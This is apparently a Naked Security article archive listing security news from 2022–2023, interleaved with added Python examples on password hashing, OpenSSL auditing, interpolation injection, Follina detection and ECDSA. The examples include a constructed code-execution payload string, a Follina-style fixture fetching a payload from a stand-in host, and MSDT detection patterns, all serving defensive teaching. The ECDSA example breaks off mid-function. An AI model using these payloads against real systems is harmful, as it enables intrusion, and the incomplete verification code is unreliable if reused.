Naked Security
Twitter tells users: Pay up if you want to keep using insecure 2FA
February 20th, 2023 at 17:58
By Paul Ducklin
Ironically, Twitter Blue users will be allowed to keep using the very 2FA process that's not considered secure enough for everyone else.
Related tags: 2-factor Authentication, Twitter, 2FA, SIM, sim swap

Apple fixes zero-day spyware implant bug – patch now!
February 14th, 2023 at 19:08
By Paul Ducklin
Everyone update now! Except for those who don't need to! Or who need to but will only get updates later on, though Apple isn't saying yet!
Related tags: Apple, Safari, Vulnerability, CVE-2023-23529, Zero Day

Password-stealing “vulnerability” reported in KeePass – bug or feature?
February 1st, 2023 at 19:58
By Paul Ducklin
Is it a vulnerability if someone with control over your account can mess with files that your account is allowed to access anyway?
Related tags: Cryptography, Data loss, Vulnerability, CVE-2023-24055, data leakage, KeePass, trigger

Serious Security: The Samba logon bug caused by outdated crypto
January 30th, 2023 at 19:59
By Paul Ducklin
Enjoy our Serious Security deep dive into this real-world example of why cryptographic agility is important!
Related tags: Cryptography, Vulnerability, CIFS, collision, CVE-2022-38023, mac, MD5, message digest, Samba, SMB

Apple patches are out – old iPhones get an old zero-day fix at last!
January 24th, 2023 at 01:24
By Paul Ducklin
Don't delay, especially if you're still running an iOS 12 device... please do it today!
Related tags: Apple, Vulnerability, CVE-2022-42856, Exploit, ios, ios 12, iPadOS, macOS Ventura, Zero Day

Microsoft dishes the dirt on Apple's “Achilles heel” shortly after fixing similar Windows bug
December 20th, 2022 at 17:59
By Paul Ducklin
It happens to the best of us: Microsoft highlights a security bypass bug on Macs that is curiously similar to a recent Windows 0-day.
Related tags: Apple, Microsoft, Vulnerability, Achilles, CVE-2022-42821, Gatekeeper, macOS, MOTW, vulnerability

Apple patches everything, finally reveals mystery of iOS 16.1.2
December 14th, 2022 at 02:11
By Paul Ducklin
There's an update for everything this time, not just for iOS.
Related tags: Apple, Vulnerability, CVE-2022-42856

Pwn2Own Toronto: 54 hacks, 63 new bugs, $1 million in bounties
December 12th, 2022 at 19:58
By Paul Ducklin
That's a mean average of $15,710 per bug... and 63 fewer bugs out there for crooks and rogues to find.
Related tags: Security events, Vulnerability, Exploit, hacking, Pwn2Own, vulnerability

SIM swapper sent to prison for 2FA cryptocurrency heist of over $20m
December 6th, 2022 at 17:56
By Naked Security writer
Guilty party got 18 months, also has to pay back $20m he probably hasn't got, which could land him in more hot water.
Related tags: Cryptocurrency, Law & order, 2FA, Cybercrime, password, sim swap

Number Nine! Chrome fixes another 2022 zero-day, Edge patched too
December 5th, 2022 at 20:58
By Paul Ducklin
Ninth more unto the breach, dear friends, ninth more.
Related tags: Google, Google Chrome, Microsoft, Vulnerability, "Edge", chrome, Chromium, CVE-2022-4262, Zero Day

The CHRISTMA EXEC network worm – 35 years and counting!
December 1st, 2022 at 20:35
By Paul Ducklin
"Uh-oh, this viruses-and-worms scene could turn out quite troublesome." If only we'd been wrong...
Related tags: Malware, 3270, Christma, CMS, IBM, Virus, worm

Serious Security: MD5 considered harmful – to the tune of $600,000
November 30th, 2022 at 17:58
By Paul Ducklin
It's not just the hashing, by the way. It's the salting and the stretching, too!
Related tags: Cryptography, Law & order, CNIL, EDF, hashing, MD5, PBKDF2

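The "salting and stretching" point in working code, as an added example that is not from the article and not from any of the parties it names: an unsalted, unstretched MD5 store of the kind the article says drew the fine, next to a PBKDF2-HMAC-SHA256 store with a per-user random salt and a high iteration count, a constant-time verifier, and the one-hash-per-guess attack that makes the MD5 store so cheap to crack. The passwords and the word list are constructed for the demo; the iteration count is an assumption chosen for illustration, not a recommendation from the page.

```python
import hashlib
import hmac
import os
from typing import Callable, Iterable, Optional, Tuple

# The weak scheme the article is about: one unsalted, unstretched MD5 per password.
def md5_store(password: str) -> str:
    """Same password -> same 32-hex digest for every user, computable at billions per second on a GPU."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()

# The scheme the article recommends: a per-user random salt plus key stretching (PBKDF2-HMAC-SHA256).
ITERATIONS = 600_000   # assumption for this demo; tune so that one hash costs roughly 0.1 s on your hardware

Record = Tuple[bytes, int, bytes]   # (salt, iteration count, derived key): all three are stored

def pbkdf2_store(password: str, salt: Optional[bytes] = None, iterations: int = ITERATIONS) -> Record:
    """Derive a 32-byte key; a fresh 16-byte salt is drawn unless one is supplied (the verification path)."""
    if salt is None:
        salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
    return salt, iterations, key

def pbkdf2_verify(password: str, record: Record) -> bool:
    """Recompute with the stored salt and count; constant-time compare so timing leaks nothing."""
    salt, iterations, expected = record
    _, _, candidate = pbkdf2_store(password, salt, iterations)
    return hmac.compare_digest(candidate, expected)

def same_password_same_hash(store: Callable[[str], object], password: str) -> bool:
    """Two users with the same password: do they get the same stored value? (Yes for MD5, no with a salt.)"""
    return store(password) == store(password)

def brute_force_md5(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """What an attacker does with an unsalted MD5 dump: one hash per guess, reusable against every user."""
    for guess in wordlist:
        if md5_store(guess) == target_hex:
            return guess
    return None

if __name__ == "__main__":
    pw = "correct horse"                                   # constructed sample password
    print("md5 collides across users:   ", same_password_same_hash(md5_store, pw))
    print("pbkdf2 collides across users:", same_password_same_hash(pbkdf2_store, pw))
    rec = pbkdf2_store(pw)
    print("verify right password:", pbkdf2_verify(pw, rec), " wrong:", pbkdf2_verify("correct h0rse", rec))
    print("md5 cracked as:", brute_force_md5(md5_store(pw), ["123456", "password", "correct horse"]))
```

With the salt, two users who picked the same password get unrelated records, so a cracked hash tells the attacker about one account only; with the iteration count, every guess costs the attacker as much as it costs the server, which is the "stretching" the article refers to.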
How to hack an unpatched Exchange server with rogue PowerShell code
November 22nd, 2022 at 19:54
By Paul Ducklin
Review your servers, your patches and your authentication policies - there's a proof-of-concept out.
Related tags: Microsoft, Uncategorized, Vulnerability, ProxyNotShell, CVE-2022-41040, CVE-2022-41082, Zero Day

Log4Shell-like code execution hole in popular Backstage dev tool
November 15th, 2022 at 17:49
By Paul Ducklin
Good old "string templating", also known as "string interpolation", in the spotlight again...
Related tags: Vulnerability, Backstage, CVE-2022-36067

Dangerous SIM-swap lockscreen bypass – update Android now!
November 11th, 2022 at 19:59
By Paul Ducklin
A bit like leaving the front door keys under the doormat...
Related tags: Android, Google, CVE-2022-20465, hacking, lockscreen, bypass, SIM

Emergency code execution patch from Apple – but not an 0-day
November 10th, 2022 at 01:49
By Paul Ducklin
Not a zero-day, but important enough for a quick-fire patch to one system library...
Related tags: Apple, iOS, OS X, Vulnerability, CVE-2022-40303, CVE-2022-40304

Twitter Blue Badge email scams – Don't fall for them!
November 4th, 2022 at 17:59
By Naked Security writer
That was the week that was...
Related tags: 2-factor Authentication, Phishing, Privacy, Spam, blue badge, phishing, Twitter, verified

The OpenSSL security update story – how can you tell what needs fixing?
November 3rd, 2022 at 00:44
By Paul Ducklin
How to Hack! Finding OpenSSL library files and accurately identifying their version numbers...
Related tags: Cryptography, Vulnerability, CVE-2022-3602, CVE-2022-3786, openssl

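One way to do the job the article describes (find the OpenSSL library files on a box and work out which version each one is), as an added example that is not the article's own code: walk a directory tree, pick out files named like OpenSSL shared libraries, pull the `OpenSSL x.y.z` banner string that the library embeds as plain text, and report whether the version falls in the range affected by CVE-2022-3602 and CVE-2022-3786 (the 3.0 branch before 3.0.7; 1.1.1 and earlier are not affected). The file-name pattern is an assumption that covers the common Linux, Windows and macOS names; the "libraries" scanned here are constructed byte blobs written to a temporary directory so that the script runs offline.

```python
import os
import re
import tempfile
from typing import Dict, Iterator, List, Optional, Tuple

# OpenSSL binaries carry a banner such as "OpenSSL 3.0.5 5 Jul 2022" as a plain C string.
BANNER = re.compile(rb"OpenSSL (\d+)\.(\d+)\.(\d+)([a-z]*)")
# Assumed naming pattern: libssl.so.3, libcrypto.so.1.1, libcrypto-3-x64.dll, libssl.3.dylib, ...
LIB_NAME = re.compile(r"^lib(ssl|crypto)[.-]", re.IGNORECASE)

Version = Tuple[int, int, int, str]

def extract_version(blob: bytes) -> Optional[Version]:
    """Return the first (major, minor, patch, letter) banner found in a binary, or None."""
    m = BANNER.search(blob)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4).decode()

def is_affected(version: Version) -> bool:
    """CVE-2022-3602 / CVE-2022-3786 affect 3.0.0 through 3.0.6 only; 3.0.7 is the fix."""
    major, minor, patch, _ = version
    return (major, minor) == (3, 0) and patch < 7

def find_openssl_libs(root: str) -> Iterator[str]:
    """Walk a tree and yield every path whose file name looks like an OpenSSL shared library."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if LIB_NAME.match(name):
                yield os.path.join(dirpath, name)

def audit(root: str) -> List[Tuple[str, Optional[str], bool]]:
    """Return (path, version string or None, affected?) for every candidate library under root."""
    results = []
    for path in find_openssl_libs(root):
        with open(path, "rb") as f:
            v = extract_version(f.read())
        results.append((path, None if v is None else "%d.%d.%d%s" % v, v is not None and is_affected(v)))
    return sorted(results)

def audit_by_name(root: str) -> Dict[str, Tuple[Optional[str], bool]]:
    """Same as audit(), keyed by file name, which is handier for reporting and for tests."""
    return {os.path.basename(p): (ver, bad) for p, ver, bad in audit(root)}

def build_sample_tree() -> str:
    """Constructed fixtures: fake 'libraries' that contain realistic banners, plus decoys."""
    root = tempfile.mkdtemp(prefix="ossl-audit-")
    fixtures = {
        "usr/lib/libssl.so.3":         b"\x7fELF" + b"\0" * 16 + b"OpenSSL 3.0.5 5 Jul 2022\0",
        "usr/lib/libcrypto.so.1.1":    b"\x7fELF" + b"OpenSSL 1.1.1q  5 Jul 2022\0",
        "app/bin/libcrypto-3-x64.dll": b"MZ\x90\0" + b"OpenSSL 3.0.7 1 Nov 2022\0",
        "app/bin/libssl-3-x64.dll":    b"MZ\x90\0" + b"no banner in this one\0",
        "app/bin/readme.txt":          b"OpenSSL 3.0.0 is mentioned here, but this is not a library",
    }
    for rel, blob in fixtures.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(blob)
    return root

if __name__ == "__main__":
    for path, version, affected in audit(build_sample_tree()):
        print("%-60s %-8s %s" % (path, version or "unknown", "PATCH NOW" if affected else "ok"))
```

Point it at `/` (or at an application's install directory) instead of the sample tree to audit a real host; a library that matches the name pattern but yields no banner is worth a manual look, since statically linked or stripped copies of OpenSSL are exactly the ones that package managers will not tell you about.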
OpenSSL patches are out – CRITICAL bug downgraded to HIGH, but patch anyway!
November 1st, 2022 at 17:24
By Paul Ducklin
That bated-breath OpenSSL update is out! It's no longer rated CRITICAL, but we advise you to patch ASAP anyway. Here's why...
Related tags: Cryptography, Vulnerability, CVE-2022-3602, CVE-2022-3786, openssl, vulnerability

SHA-3 code execution bug patched in PHP – check your version!
November 1st, 2022 at 14:09
By Paul Ducklin
As everyone waits for news of a bug in OpenSSL, here's a reminder that other cryptographic code in your life may also need patching!
Related tags: Cryptography, Vulnerability, cryptography, CVE-2022-37454, PHP, sha-3

Chrome issues urgent zero-day fix – update now!
October 29th, 2022 at 15:08
By Paul Ducklin
We've said it before/And we'll say it again/It's not *if* you should patch/It's a matter of *when*. (Hint: now!)
Related tags: Google, Google Chrome, Vulnerability, "Edge", chrome, Chromium, CVE-2022-3723, Exploit, Zero Day

Updates to Apple's zero-day update story – iPhone and iPad users read this!
October 28th, 2022 at 18:04
By Paul Ducklin
Turns out that Tuesday's zero-day for iOS 16 is Friday's zero-day for iOS 15...
Related tags: Apple, Vulnerability, CVE-2022-42827, iPad, iPhone, spyware, Zero Day

Apple megaupdate: Ventura out, iOS and iPad kernel zero-day – act now!
October 25th, 2022 at 18:03
By Paul Ducklin
Ventura hits the market with 112 patches, Catalina's gone missing, and iPhones and iPads get a critical kernel-level zero-day patch...
Related tags: Apple, iOS, OS X, Vulnerability, CVE-2022-42827, Exploit, ios, iPad, iPhone, mac, vulnerability, zero-day

Zoom for Mac patches sneaky “spy-on-me” bug – update now!
October 18th, 2022 at 18:01
By Paul Ducklin
Hey! That back door isn't supposed to be there at all, let alone propped open...
Related tags: Uncategorized, CVE-2022-28762, snooping, spyware, vulnerability, zoom

Dangerous hole in Apache Commons Text – like Log4Shell all over again
October 18th, 2022 at 17:26
By Paul Ducklin
Third time unlucky. Time to put your patching boots on again...
Related tags: Vulnerability, Apache, Apache Commons Text, CVE-2022-42889, Log4j, Log4Shell, string interpolation

Mystery iPhone update patches against iOS 16 mail crash-attack
October 11th, 2022 at 00:28
By Paul Ducklin
The problem with crashy messaging apps is that *other people* get to choose if and when to send you messages...
Related tags: Apple, iOS, Vulnerability, crash-of-death, CVE-2022-22658, ios

S3 Ep102.5: “ProxyNotShell” Exchange bugs – an expert speaks [Audio + Text]
October 1st, 2022 at 14:05
By Paul Ducklin
Who's affected, what you can do while waiting for Microsoft's patches, and how to plan your threat hunting...
Related tags: Microsoft, Podcast, Vulnerability, ProxyNotShell, chester wisniewski, CVE-2022-41040, CVE-2022-41082, exchange, Zero Day

URGENT! Microsoft Exchange double zero-day – “like ProxyShell, only different”
September 30th, 2022 at 18:25
By Paul Ducklin
Double-play 0-day in Exchange - what you need to know, and what you can do
Related tags: Microsoft, Vulnerability, CVE-2022-41040, CVE-2022-41082, exchange, vulnerability, Zero Day

Uber and Rockstar – has a LAPSUS$ linchpin just been busted (again)?
September 24th, 2022 at 22:57
By Paul Ducklin
Is this the same suspect as before? Is he part of LAPSUS$? Is this the man who hacked Uber and Rockstar? And, if so, who else?
Related tags: Law & order, 2FA, hacking, lapsus, Rockstar, Uber

S3 Ep101: Uber and LastPass breaches – is 2FA all it's cracked up to be? [Audio + Text]
September 22nd, 2022 at 18:42
By Paul Ducklin
Latest episode - listen now! Learn why adopting 2FA isn't a reason to relax your other security precautions...
Related tags: Data loss, Podcast, 2FA, data breach, LastPass, MFA, Naked Security Podcast, Uber

Chrome and Edge fix zero-day security hole – update now!
September 5th, 2022 at 15:12
By Paul Ducklin
This time, the crooks got there first - only 1 security hole patched, but it's a zero-day.
Related tags: Google, Google Chrome, Vulnerability, chrome, CVE-2022-3075, Exploit, Patch, Zero Day

URGENT! Apple slips out zero-day update for older iPhones and iPads
August 31st, 2022 at 18:42
By Paul Ducklin
Patch as soon as you can - that recent WebKit zero-day affecting new iPhones and iPads is apparently being used against older models, too.
Related tags: Apple, iOS, CVE-2022-32893, ios, spyware, webkit, Zero Day

Laptop denial-of-service via music: the 1980s R&B song with a CVE!
August 22nd, 2022 at 16:03
By Paul Ducklin
We haven't validated this vuln ourselves... but the source of the story is impeccable. (Impeccably dressed, at least.)
Related tags: Vulnerability, chen, CVE-2022-38392, Janet Jackson, music, Raymond Chen, resonance

Apple patches double zero-day in browser and kernel – update now!
August 17th, 2022 at 23:33
By Paul Ducklin
Double 0-day exploits - one in WebKit (to break in) and the other in the kernel (to take over). Patch now!
Related tags: Apple, iOS, Malware, OS X, Vulnerability, CVE-2022-32893, CVE-2022-32894, ios, iPadOS, jailbreak, macOS, spyware

Zoom for Mac patches critical bug – update now!
August 15th, 2022 at 18:26
By Paul Ducklin
There's many a slip 'twixt the cup and the lip. Or at least between the TOC and the TOU...
Related tags: OS X, Vulnerability, CVE-2022-28756, macOS, Wardle, zoom

APIC/EPIC! Intel chips leak secrets even the kernel shouldn't see…
August 10th, 2022 at 16:59
By Paul Ducklin
If you've ever written code that left stuff lying around in memory when you didn't need it any more... we bet you've regretted it!
Related tags: Cryptography, Data loss, Vulnerability, APIC, CVE-2022-21233, EPIC, SGX, ÆPIC Leak

GnuTLS patches memory mismanagement bug – update now!
August 1st, 2022 at 16:55
By Paul Ducklin
GnuTLS may well be the most widespread cryptographic toolkit you've never heard of. Learn more...
Related tags: Cryptography, Vulnerability, CVE-2022-2509, double-free, gnutls, heartbleed

Critical Samba bug could let anyone become Domain Admin – patch now!
July 27th, 2022 at 21:15
By Paul Ducklin
It's a serious bug... but there's a fix for it, so you know exactly what to do!
Related tags: Vulnerability, CVE-2022-32744, password reset, Samba

Facebook 2FA scammers return – this time in just 21 minutes
July 13th, 2022 at 16:46
By Paul Ducklin
Last time they arrived 28 minutes after lighting up their fake domain... this time it was just 21 minutes
Related tags: Facebook, Phishing, Privacy, 2FA, Scam

Apache “Commons Configuration” patches Log4Shell-style bug – what you need to know
July 8th, 2022 at 00:59
By Paul Ducklin
It's a bit like Log4J, but for configuration files, not for logging.
Related tags: Vulnerability, Apache Commons, CVE-2022-33980

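The Backstage (CVE-2022-36067), Apache Commons Text (CVE-2022-42889) and Apache Commons Configuration (CVE-2022-33980) entries above are the same bug class: a `${prefix:value}` string interpolator whose lookup table includes prefixes that execute code or fetch URLs, applied to text an attacker can influence. As an added example, not code from any of those projects, here is a minimal model of that interpolator in Python: the vulnerable shape (every registered prefix honoured, output re-scanned until nothing changes) beside a hardened shape (allow-listed, side-effect-free prefixes only, one pass, unknown placeholders left verbatim). The `script` and `url` lookups here only record what they were asked to do; the payload string follows the form reported for CVE-2022-42889 and is constructed for the demo.

```python
import re
from typing import Callable, Dict, List, Mapping, Tuple

# "${prefix:value}" placeholders, the shape used by Commons Text's StringSubstitutor and similar code.
PLACEHOLDER = re.compile(r"\$\{([a-zA-Z]+):([^}]*)\}")

# Stand-ins for the dangerous interpolators. A real "script" lookup evaluates the expression and a real
# "url" lookup fetches the address (SSRF / exfiltration); these just log the request so the demo is safe.
_ATTACKER_WINS: List[Tuple[str, str]] = []

def script_lookup(expr: str) -> str:
    _ATTACKER_WINS.append(("script", expr))
    return "<script result>"

def url_lookup(url: str) -> str:
    _ATTACKER_WINS.append(("url", url))
    return "<fetched>"

def const_lookup(name: str) -> str:
    """A harmless lookup: constants from a fixed table (constructed sample data)."""
    return {"app.name": "demo", "app.version": "1.0"}.get(name, "")

DEFAULT_LOOKUPS: Dict[str, Callable[[str], str]] = {
    "script": script_lookup, "url": url_lookup, "const": const_lookup,
}

def attack_log() -> List[Tuple[str, str]]:
    return list(_ATTACKER_WINS)

def reset_log() -> None:
    _ATTACKER_WINS.clear()

def interpolate_unsafe(template: str, lookups: Mapping[str, Callable[[str], str]] = DEFAULT_LOOKUPS) -> str:
    """Vulnerable pattern: any registered prefix is honoured, and the output is re-scanned until it stops
    changing, so user-controlled text that reaches the template reaches the script/url lookups."""
    def resolve(m: "re.Match[str]") -> str:
        fn = lookups.get(m.group(1))
        return fn(m.group(2)) if fn else m.group(0)
    prev = None
    while prev != template:                     # recursive interpolation, the Log4Shell-style amplifier
        prev, template = template, PLACEHOLDER.sub(resolve, template)
    return template

SAFE_PREFIXES = frozenset({"const"})

def interpolate_safe(template: str, lookups: Mapping[str, Callable[[str], str]] = DEFAULT_LOOKUPS) -> str:
    """Hardened pattern: allow-listed, side-effect-free prefixes only; a single pass, so substituted output
    is never re-interpreted; anything else is left exactly as written."""
    def resolve(m: "re.Match[str]") -> str:
        prefix = m.group(1)
        if prefix in SAFE_PREFIXES and prefix in lookups:
            return lookups[prefix](m.group(2))
        return m.group(0)
    return PLACEHOLDER.sub(resolve, template)

def render_greeting(name_from_user: str, safe: bool) -> str:
    """The typical bug: untrusted input is concatenated into a template *before* interpolation."""
    template = "Hello " + name_from_user + ", welcome to ${const:app.name}"
    return (interpolate_safe if safe else interpolate_unsafe)(template)

if __name__ == "__main__":
    payload = "${script:javascript:java.lang.Runtime.getRuntime().exec('id')}"   # constructed payload
    print(render_greeting(payload, safe=False), attack_log())
    reset_log()
    print(render_greeting(payload, safe=True), attack_log())
```

The fix that the three projects shipped amounts to the second function: the code-executing and network-reaching prefixes are no longer enabled by default, so a template that merely contains `${script:...}` resolves to nothing more interesting than itself.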
S3 Ep90: Chrome 0-day again, True Cybercrime, and a 2FA bypass [Podcast + Transcript]
July 7th, 2022 at 18:46
By Paul Ducklin
Listen now! Or read if you prefer...
Related tags: Cryptocurrency, Google, Google Chrome, Law & order, Podcast, Vulnerability, 2FA, busts, cryptocurrency, Naked Security Podcast, OneCoin

Google patches “in-the-wild” Chrome zero-day – update now!
July 5th, 2022 at 15:55
By Paul Ducklin
Running Chrome? Do the "Help-About-Update" dance move right now, just to be sure...
Related tags: Google, Google Chrome, Vulnerability, chrome, CVE-2022-2294, vulnerability, zero-day, Zero Day

Facebook 2FA phish arrives just 28 minutes after scam domain created
July 1st, 2022 at 20:01
By Paul Ducklin
The crooks hit us up with this phishing email less than half an hour after they activated their new scam domain.
Related tags: Data loss, Facebook, Phishing, Privacy, 2FA, phishing, Scam

S3 Ep87: Follina, AirTags, ID theft and the Law of Big Numbers [Podcast]
June 16th, 2022 at 16:52
By Paul Ducklin
Latest episode - listen now!
Related tags: Apple, Microsoft, Phishing, Podcast, Vulnerability, CVE-2022-30190, Exploit, Follina, phishing, SMS, vishing, vulnerability

Follina gets fixed – but it's not listed in the Patch Tuesday patches!
June 15th, 2022 at 01:20
By Paul Ducklin
We tried it out to make sure, so you don't have to.
Related tags: Microsoft, Vulnerability, CVE-2022-30190, Follina, Patch Tuesday

You're invited! Join us for a live walkthrough of the “Follina” story…
June 13th, 2022 at 16:28
By Paul Ducklin
Live demo, plain English, no sales pitch, just a chance to watch an attack dissected in safety. Join us if you can!
Related tags: Malware, Security leadership, Vulnerability, CVE-2022-30190, Follina, webinar

Atlassian announces 0-day hole in Confluence Server – update now!
June 3rd, 2022 at 18:59
By Paul Ducklin
Zero-day announced - here's what you need to know
Related tags: Vulnerability, atlassian, CVE-2022-26134, Zero Day

S3 Ep85: Now THAT'S what I call a Microsoft Office exploit! [Podcast]
June 2nd, 2022 at 18:37
By Paul Ducklin
Latest episode - listen now!
Related tags: Phishing, Podcast, Privacy, Vulnerability, CVE-2022-30190, Follina, Naked Security Podcast, smishing, SMS, webcam

Mysterious “Follina” zero-day hole in Office – here's what to do!
May 30th, 2022 at 23:01
By Paul Ducklin
News has emerged of a "feature" in Office that has been abused as a zero-day bug to run evil code. Turning off macros doesn't help!
Related tags: Microsoft, Security threats, Vulnerability, CVE-2022-30190, Follina, ms-msdt, MSDT, Office, Zero Day

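Because Follina (CVE-2022-30190) needs no macros, a macro scanner never sees it: the document carries an external relationship that makes Word fetch remote content, and that content invokes the `ms-msdt:` protocol handler. Here, as an added example that is not from the article or from Microsoft, is a detection heuristic for the Follina entries above: open a `.docx` as the ZIP it is, flag any relationship of type `oleObject` or `attachedTemplate` whose `TargetMode` is `External`, and separately flag any part that mentions the MSDT handler. The relationship types and marker strings are those reported for the Follina samples; the three documents the script examines are constructed in memory, with an RFC 5737 documentation address standing in for the attacker's host.

```python
import io
import re
import zipfile
from typing import List
from xml.etree import ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OOXML = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
# Relationship types a Follina-style document uses to pull remote content into Word without macros.
REMOTE_REL_TYPES = ("/oleObject", "/attachedTemplate")
# Strings that betray the MSDT protocol-handler abuse once the remote HTML has been fetched or inlined.
MSDT_PATTERN = re.compile(rb"ms-msdt:|msdt\.exe|IT_BrowseForFile", re.IGNORECASE)

def scan_docx(blob: bytes) -> List[str]:
    """Return findings for one .docx held in memory; an empty list means nothing suspicious was seen."""
    findings: List[str] = []
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        for name in z.namelist():
            if not name.startswith("word/"):
                continue
            data = z.read(name)
            if name.endswith(".rels"):
                root = ET.fromstring(data)
                for rel in root.iter("{%s}Relationship" % REL_NS):
                    rtype, target = rel.get("Type", ""), rel.get("Target", "")
                    if rel.get("TargetMode") == "External" and rtype.endswith(REMOTE_REL_TYPES):
                        findings.append("external %s target %s in %s" % (rtype.rsplit("/", 1)[-1], target, name))
            if MSDT_PATTERN.search(data):
                findings.append("ms-msdt reference in %s" % name)
    return findings

def build_docx(rels_xml: str, document_xml: str = "<w:document/>") -> bytes:
    """Constructed minimal .docx containing only the parts the scanner inspects."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()

# A normal document: an internal styles part and an ordinary external hyperlink (not a finding).
BENIGN_RELS = (
    '<Relationships xmlns="%s">'
    '<Relationship Id="rId1" Type="%s/styles" Target="styles.xml"/>'
    '<Relationship Id="rId2" Type="%s/hyperlink" Target="https://example.com/" TargetMode="External"/>'
    '</Relationships>'
) % (REL_NS, OOXML, OOXML)

# The Follina shape: an OLE object whose target is a remote HTML page (constructed; 198.51.100.7 is TEST-NET-2).
FOLLINA_LIKE_RELS = (
    '<Relationships xmlns="%s">'
    '<Relationship Id="rId5" Type="%s/oleObject" Target="http://198.51.100.7/payload.html!" TargetMode="External"/>'
    '</Relationships>'
) % (REL_NS, OOXML)

if __name__ == "__main__":
    samples = {
        "benign": build_docx(BENIGN_RELS),
        "follina-like": build_docx(FOLLINA_LIKE_RELS),
        "inline-msdt": build_docx(BENIGN_RELS, "<w:document>ms-msdt:/id PCWDiagnostic /skip force</w:document>"),
    }
    for label, doc in samples.items():
        print("%-13s %s" % (label, scan_docx(doc) or "clean"))
```

Run `scan_docx` over mail-gateway attachments or a quarantine folder; an external `oleObject` pointing at an http(s) URL is rare enough in legitimate documents that it is worth a human look every time, whereas external hyperlinks are routine, which is why the heuristic ignores them.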
Mozilla patches Wednesday's Pwn2Own double-exploit… on Friday!
May 20th, 2022 at 23:47
By Paul Ducklin
That was quick! 48 hours from exploit report to published patch.
Related tags: Firefox, Mozilla, Vulnerability, CVE-2022-1529, CVE-2022-1802, Manfred Paul, Pwn2Own

US Government says: Patch VMware right now, or get off our network
May 20th, 2022 at 14:03
By Paul Ducklin
Find and patch. Right now. If you can't patch, get it off the network. Right now! Oh, and show us what you did to comply.
Related tags: Vulnerability, CVE-2022-22972, CVE-2022-22973, Federal Government, MTR, VMware

Pwn2Own hacking schedule released – Windows and Linux are top targets
May 18th, 2022 at 13:04
By Paul Ducklin
What's better? Disclose early, patch fast? Or dig deep, disclose in full, patch more slowly?
Related tags: Vulnerability, hacking, Pwn2Own, research, secops

Firefox out-of-band update to 100.0.1 – just in time for Pwn2Own?
May 15th, 2022 at 21:53
By Paul Ducklin
A new point-release of Firefox. Not unusual, but the timing of this one is interesting, with Pwn2Own coming up in a few days.
Related tags: Firefox, Mozilla, Pwn2Own, Sandbox

RubyGems supply chain rip-and-replace bug fixed – check your logs!
May 9th, 2022 at 15:41
By Paul Ducklin
Imagine if you could assume the identity of, say, Franklin Delano Roosevelt simply by showing up and calling yourself "Frank".
Related tags: Vulnerability, CVE-2022-29176, ruby, RubyGems, supply chain, vulnerability

Critical cryptographic Java security blunder patched – update now!
April 20th, 2022 at 16:43
By Paul Ducklin
Either know the private key and use it scrupulously in your digital signature calculation.... or just send a bunch of zeros instead.
Related tags: Cryptography, Java, Oracle, Vulnerability, CVE-2022-21449, digital signature, vulnerability

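The "bunch of zeros" remark refers to an ECDSA verifier that omits the check that both signature values r and s lie in [1, n-1]. As an added example, not Oracle's code and not a reimplementation of the JDK fix, here is a small pure-Python ECDSA over NIST P-256: signing, a correct verifier that performs the range check first, and a deliberately unchecked verifier that models the CVE-2022-21449 failure by treating the inverse of 0 as 0 and the point at infinity as having x-coordinate 0. Under that model the all-zero signature (r, s) = (0, 0) verifies for any message under any public key; the checked verifier rejects it before touching the curve. The private key and fixed nonce are test values used only so the demo is reproducible; real signing needs a fresh secret nonce every time, and this textbook arithmetic is not constant-time.

```python
import hashlib
import secrets
from typing import Optional, Tuple

# NIST P-256 (secp256r1): y^2 = x^3 + A*x + B over GF(P), base point G of prime order N.
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)

Point = Optional[Tuple[int, int]]   # None stands for the point at infinity (the group identity)

def add(p1: Point, p2: Point) -> Point:
    """Affine point addition, covering doubling and the identity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None                                     # p1 == -p2
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P

def mul(k: int, p: Point) -> Point:
    """Double-and-add scalar multiplication (demo only; not constant-time)."""
    acc: Point = None
    while k > 0:
        if k & 1:
            acc = add(acc, p)
        p = add(p, p)
        k >>= 1
    return acc

def hash_to_int(msg: bytes) -> int:
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N

def sign(d: int, msg: bytes, k: Optional[int] = None) -> Tuple[int, int]:
    """ECDSA signing. k MUST be secret, uniform and never reused; a caller-supplied k is accepted
    here only so that the demo is reproducible."""
    e = hash_to_int(msg)
    while True:
        if k is None:
            k = secrets.randbelow(N - 1) + 1
        r = mul(k, G)[0] % N
        s = pow(k, -1, N) * (e + r * d) % N
        if r != 0 and s != 0:
            return r, s
        k = None                                        # astronomically unlikely; draw a fresh nonce

def verify(q: Point, msg: bytes, sig: Tuple[int, int]) -> bool:
    """Correct ECDSA verification: r and s must both lie in [1, N-1] before any curve arithmetic."""
    r, s = sig
    if not (1 <= r < N and 1 <= s < N):
        return False
    e = hash_to_int(msg)
    w = pow(s, -1, N)
    R = add(mul(e * w % N, G), mul(r * w % N, q))
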